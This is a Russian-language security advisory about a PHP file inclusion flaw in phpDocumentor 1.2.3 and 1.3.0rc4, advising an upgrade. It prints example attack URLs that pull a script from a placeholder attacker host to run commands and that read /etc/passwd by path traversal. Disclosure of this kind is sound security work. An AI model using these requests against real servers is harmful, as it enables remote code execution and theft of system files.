PHP-инклюдинг в phpDocumentor

Дата публикации:
31.12.2005
Дата изменения:
24.03.2009
Всего просмотров:
2873
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpDocumentor 1.x
Уязвимые версии: phpDocumentor 1.2.3 и 1.3.0rc4

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "FORUM[LIB]" сценария "Documentation/tests/bug-559668.php" и параметре "root_dir" сценария "docbuilder/file_dialog.php". Удаленный пользователь может с помощью специально сформированного запроса просмотреть файлы и выполнить произвольный PHP код на целевой системе с привилегиями Web севера. Примеры:

http://[target]/[path_to_phpdocumentor]/Documentation/tests/
bug-559668.php?cmd=ls%20-la&FORUM[LIB]=http://[attacker]

http://[target]/[path_to_phpdocumentor]/Documentation/tests/
bug-559668.php?FORUM[LIB]=http://[attacker]/script.txt%00
http://[target]/[path_to_phpdocumentor]/Documentation/tests/
bug-559668.php?FORUM[LIB]=../../../../../../../etc/passwd%00

URL производителя: www.phpdoc.org

Решение: Установите последнюю версию с сайта производителя.

Источник:

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: PhpDocumentor <= 1.3.0 rc4 Arbitrary remote/local inclusion

или введите имя

CAPTCHA